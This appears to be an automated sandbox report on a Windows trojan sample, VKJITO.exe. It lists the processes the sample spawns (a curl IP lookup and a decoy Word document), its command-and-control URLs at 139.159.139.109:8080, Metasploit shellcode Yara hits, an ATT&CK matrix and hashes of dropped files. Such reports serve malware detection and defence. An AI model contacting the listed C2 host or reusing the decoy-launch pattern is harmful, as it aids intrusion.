        Source: Amcache.hve.9.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.9.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\VKJITO.exe | Code function: 0_2_00007FF7D435A9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D435A9C0
        Source: C:\Users\user\Desktop\VKJITO.exe | Code function: 0_2_00007FF7D433E590 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF7D433E590
        Source: C:\Users\user\Desktop\VKJITO.exe | Code function: 0_2_00007FF7D435AB64 SetUnhandledExceptionFilter,0_2_00007FF7D435AB64
        Source: C:\Users\user\Desktop\VKJITO.exe | Memory allocated: page read and write | page guard
        Source: C:\Users\user\Desktop\VKJITO.exe | Process created: C:\Windows\System32\curl.exe "curl" ip.sb
        Source: C:\Users\user\Desktop\VKJITO.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
        Source: C:\Users\user\Desktop\VKJITO.exe | Code function: 0_2_00007FF7D4342940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exe | Code function: 0_2_00007FF7D435A89C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7D435A89C
        Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
        Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe

        Remote Access Functionality

        Source: Yara match File source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Browser Extensions | 12 Process Injection | 2 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
        | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 12 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 3 System Information Discovery | SSH | Keylogging | 112 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Extra Window Memory Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
        Behavior Graph
        ID: 1577651, Sample: VKJITO.exe, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 92
        DNS/IP: templatesmetadata.office.net, ip.sb
        Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
        • VKJITO.exe (started)
          • DNS/IP: 139.159.139.109, 49707, 8080, HWCSNETHuaweiCloudServicedatacenterCN, China
          • WerFault.exe (started)
            • dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode
          • curl.exe (started)
            • DNS/IP: ip.sb, 104.26.12.31, 49706, 80, CLOUDFLARENETUS, United States
            • DNS/IP: 127.0.0.1, unknown, unknown
            • conhost.exe (started)
          • cmd.exe (started)
            • WINWORD.EXE (started)
            • conhost.exe (started)

        | Source | Detection | Scanner | Label | Link |
        | --- | --- | --- | --- | --- |
        | VKJITO.exe | 42% | ReversingLabs | Win64.Trojan.Iphellsgate | |

        No Antivirus matches

        | Source | Detection | Scanner | Label | Link |
        | --- | --- | --- | --- | --- |
        | http://139.159.139.109/uz68 | 0% | Avira URL Cloud | safe | |
        | http://39.159.139.109:8080/uz68 | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68cex | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68fap | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68g | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68 | 0% | Avira URL Cloud | safe | |

        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
        | --- | --- | --- | --- | --- | --- |
        | ip.sb | 104.26.12.31 | true | false | | high |

        | Name | Malicious | Antivirus Detection | Reputation |
        | --- | --- | --- | --- |
        | http://139.159.139.109/uz68 | true | Avira URL Cloud: safe | unknown |
        | http://39.159.139.109:8080/uz68 | true | Avira URL Cloud: safe | unknown |
        | http://139.159.139.109:8080/uz68 | true | Avira URL Cloud: safe | unknown |
        | http://ip.sb/ | false | | high |

        | Name | Source | Malicious | Antivirus Detection | Reputation |
        | --- | --- | --- | --- | --- |
        | http://upx.sf.net | Amcache.hve.9.dr | false | | high |
        | http://139.159.139.109:8080/uz68cex | VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
        | http://139.159.139.109:8080/uz68fap | VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
        | http://ip.sb/00005 | curl.exe, 00000001.00000002.2054270083.0000022B7B259000.00000004.00000020.00020000.00000000.sdmp | false | | high |
        | http://139.159.139.109:8080/uz68g | VKJITO.exe, 00000000.00000002.2451554357.000001A673B0E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
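
        | IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
        | --- | --- | --- | --- | --- | --- | --- |
        | 139.159.139.109 | unknown | China | | 55990 | HWCSNETHuaweiCloudServicedatacenterCN | true |
        | 104.26.12.31 | ip.sb | United States | | 13335 | CLOUDFLARENETUS | false |

        | IP |
        | --- |
        | 127.0.0.1 |
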
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1577651
                Start date and time:2024-12-18 16:22:23 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 45s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:VKJITO.exe
                Detection:MAL
                Classification:mal92.troj.winEXE@12/235@1/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 94%
                • Number of executed functions: 20
                • Number of non-executed functions: 90
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 52.109.89.19, 52.111.252.15, 52.111.252.18, 52.111.252.16, 52.111.252.17, 52.182.143.210, 2.17.100.200, 2.17.100.210, 2.19.198.179, 2.19.198.178, 2.19.198.112, 2.19.198.162, 2.19.198.171, 2.19.198.130, 2.19.198.145, 2.19.198.161, 20.42.73.29, 40.126.31.71, 20.12.23.50, 13.107.246.43, 23.218.208.109
                • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, eur.roaming1.live.com.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, onedsblobprdeus15.eastus.cloudapp.azure.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, onedscolprdcus10.centralus.cloudapp.azure.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, otelrules.azureedge.net, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguag
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: VKJITO.exe

        | Time | Type | Description |
        | --- | --- | --- |
        | 10:23:53 | API Interceptor | 1x Sleep call for process: WerFault.exe modified |
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):118
                                    Entropy (8bit):3.5700810731231707
                                    Encrypted:false
                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                    MD5:573220372DA4ED487441611079B623CD
                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8991266529241227
                                    Encrypted:false
                                    SSDEEP:96:EwFVvJmi8yswAioh7JfYQXIDcQWc6zcEZcw37X+HbHg/KownOg3FxTYbATFwdJTb:R3x78yA0I3D0jovNzuiFlZ24lO8X
                                    MD5:9ABB2544B6F65B4C85291F3625B888F9
                                    SHA1:B96EEF156E3042EBDEE3D9E776053A2F19B5D4FE
                                    SHA-256:F8FA68A13EA933C4B783F092D2E5EE287C1A6051F434FB3B49FCD74F1FB155AA
                                    SHA-512:8D46B92F3C10A895CFE43181C2F310448ABA19A393E91985F947A14E85530A744B3FA2DC7C00C4CAB31DA32F36BDC8F79F2EE8D4B6B1B52EFB5138E7F4B43777
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.8.9.9.8.5.7.1.9.7.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.8.9.9.9.6.0.3.2.2.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.7.0.b.f.7.3.-.a.6.9.0.-.4.f.5.a.-.a.2.4.a.-.8.b.3.8.e.9.7.5.1.b.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.0.7.f.8.d.9.-.1.b.5.3.-.4.9.b.3.-.b.8.e.0.-.d.a.3.b.3.2.4.4.8.5.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.V.K.J.I.T.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.f.0.-.0.0.0.1.-.0.0.1.4.-.6.2.d.0.-.6.1.c.0.6.0.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.2.0.8.1.7.2.3.0.4.2.3.4.b.c.4.2.2.a.7.d.f.4.5.b.9.1.3.f.a.9.e.0.0.0.0.0.0.0.0.!.0.0.0.0.a.e.4.3.a.1.0.d.4.6.2.f.0.9.a.a.7.b.9.4.5.b.5.b.3.7.a.a.d.9.c.0.d.1.d.f.4.b.0.1.!.V.K.J.I.T.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.1.7.:.0.4.:.5.2.:.0.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 15:23:19 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):155650
                                    Entropy (8bit):1.3130107134741882
                                    Encrypted:false
                                    SSDEEP:384:EH8LjvVKdNtHhKQG3Qls2lBb9h24YjAFFuKL7zvZ7/Nx76TXHVAB0:u8LbVKdLNXvZ7L76zH9
                                    MD5:1AA5C0BDCCC586BB76DF04CBC3536515
                                    SHA1:B3CF2CC51BA7BC0AF0DA29A769211FAE5A1623FF
                                    SHA-256:2417B8DECEA81D2DF312E904FDE715310E65789D3966A551B27DCC70C8D441F7
                                    SHA-512:A7AF2B17EF7B7313F17326F4F58DF3DC6BF27CD59A54CE77FF6A9DE80DD12529AFA2E8F38D65108D3F443BA6CE190935B3393681863D38E96B9139190320A33D
                                    Malicious:false
                                    Yara Hits:
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, Author: unknown
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8758
                                    Entropy (8bit):3.710024426708561
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJMf+U6YEIZLjhLngmfIUpD789bZg1fUSTm:R6lXJ896YEajhLngmfIlZqfUv
                                    MD5:4C5D840114F9A187680196C811155260
                                    SHA1:E759A77E819091A87CED2260ABC5BCA6B852F399
                                    SHA-256:528AE462C79CBA46DC5B9068037F6FB3C4AB503FEEC0ECB59050A7872276F448
                                    SHA-512:7A787FB29229AB79E57338687F89B938E940855AE90BF999FA581D0716A7BDA3B5B74871B9E5C33F6794AA451635D9CEF8C380BB932C5DB733099F7C2D8D111E
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.5.6.<./.P.i.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4661
                                    Entropy (8bit):4.495845837979619
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsrJg771I9f9zuWpW8VY+Ym8M4J+doOKFndRvyq859AZOD5CTz3Ed:uIjfFI7G9zP7VKJD5Rv/c+z3Ed
                                    MD5:BE6C1B199E4EF7E21FE9680D73C18AE0
                                    SHA1:4754AE8528DF187652B01C789E632563C6B8C2AC
                                    SHA-256:ABC70D1402DEE03A833C7ABEFD77B1999D1C6687EC2338C063F8DA756550D3B2
                                    SHA-512:B53F39A591AA9D3B49950E60A480BD941DCAE0A6C5AD5E4AA6543FF525B5178A13A2E35F5CF541AB278F8928D7AC6F2A25C61B144B0DF9C57DCEF0582FBF3852
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636866" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2278
                                    Entropy (8bit):3.8460872679742852
                                    Encrypted:false
                                    SSDEEP:48:uiTrlKxsxxgSxl9Il8uH+zlfbKB4aU30xDCDPO4c6lyV+l22d1rc:v9Yh+z9bWUe4OiyHt
                                    MD5:8017B9E6C19C38BA8B6851A559D40B9F
                                    SHA1:10929965EF67CB68A4C7FB0175D9BDDED0EE5788
                                    SHA-256:0E7C7979B6F93C4C4F6923A97C9F81B3A555D1758456E0B9D7E5FE5A84B7AD2E
                                    SHA-512:0C71D10D512E6AC47FD9770F0BB43997E09D60DD9E7797B33D4F49219F971BAC4A932EF426E1A19D4C3F3D91978C31CB1C8AD5D2F6D5C98983EF5CDA0EF50493
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2684
                                    Entropy (8bit):3.9130982548486224
                                    Encrypted:false
                                    SSDEEP:48:uiTrlKxJx/yxl9Il8uHFqIYKs+wqtl31aEVigZVlkSh4oG1QWd/vc:0WYhUfVS1lVLVlkSuojz
                                    MD5:336EBC0EBD2DC85AFB1E322F5453224E
                                    SHA1:C73C2695CCFBCA88DF8D564254E5E5B411AACA99
                                    SHA-256:615975DA620CDFFEE0939A05477DB782D200AE63EE634034D85E2E803448A6A6
                                    SHA-512:6BC96F9D4C619D3AFF59AAD60ACAFDD2D91C8BE25C56F2228D0FE61F0E500350B572B22A5483EBCD76BA4846F495645B1DF1587356FF8DCBAFBD16A3E011CE30
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):4542
                                    Entropy (8bit):3.99891190495304
                                    Encrypted:false
                                    SSDEEP:96:5oYhDcTejsudwtKgnnodOCR2ifoqaqvZizzjhbDZcUX+K:ieGis7ttnnoX2ifNaiZizlDyc
                                    MD5:5D58C850DEA929C732C971D89E692A25
                                    SHA1:4FBE9CA4C8336BDF9F56BF2CA36A111A91D44604
                                    SHA-256:B6F6E1A22BA2CAED8597F71740D1E154E2F33800AE3BBA7A15EF891C40AA2C5D
                                    SHA-512:4C71A30582D258692EAC6C90902ABFF32EBF4E1FD6F6987F0E12FAC6AD505F8CFB9CD23A53A58B7062424D89464F84002662E41D0FCA9EE6A6F569E601647CA1
                                    Malicious:false
                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.E.8.p.E.W.F.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.e.T.a.0.N.3.
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2526
                                    Entropy (8bit):3.697045615801272
                                    Encrypted:false
                                    SSDEEP:24:44Enc9A02WMCtb4IkcRwdt/SCUAot4In3c6FM5jKBuqt0ZLsh:sncOAMCV1hRwrUAoKKcFjKMflsh
                                    MD5:A2D3CD5511089530920A870694F1024C
                                    SHA1:7CE0704A7C5EB0071498A0B820BEE38FB37F6D19
                                    SHA-256:389E3B38B89E5DEC101C490EEFDBF635642E8CFE6954D29778070FAD9718C056
                                    SHA-512:5ED1DE7E836F2C271C8F182D33DC576A461A31000FD88F9406AFF4D7FD21FBFC954C72D39F6DF70627FB5E7F043D710907468AA0B8AD77B2B51C01B70623495C
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:ASCII text, with very long lines (1982), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.01431233863609655
                                    Encrypted:false
                                    SSDEEP:768:xVTV4s0/wXra8hLSprtwjkDZ0Zh1B8xUuf5K2XB+i:xVTV4s047a8xu2jkDZ0L1B8T5K2XBh
                                    MD5:791AA4BA39043F4B0F973EA10FFEB280
                                    SHA1:2A29F1EBFBBB26EA719DAB323112EB6EF7B0C3E6
                                    SHA-256:F6E4FA56ECA50D0DDCEE40CB43E205D7A5B0A541EDD596A711CC2BE6F6FB09B3
                                    SHA-512:A27558803250811D50B35344DCC6209684D17C5C9447D831E62A060CB901360C294A34271AC049EE24CBE664435DFD4034308D49C6E5969D01A90D81E1B74B7B
                                    Malicious:false
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/18/2024 15:23:24.919.WINWORD (0x10D4).0x1A04.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-12-18T15:23:24.919Z","Contract":"Office.System.Activity","Activity.CV":"AX3R4DZWH0u5F16PgGe97A.7.1","Activity.Duration":336,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/18/2024 15:23:24.935.WINWORD (0x10D4).0x1A04.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-18T15:23:24.935Z","Contract":"Office.System.Activity","Activity.CV":"AX3R4DZWH0u5F16PgGe97A.7","Activity.Duration":4172,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):3.538396048757031
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                    MD5:149948E41627BE5DC454558E12AF2DA4
                                    SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                    SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                    SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                    Malicious:false
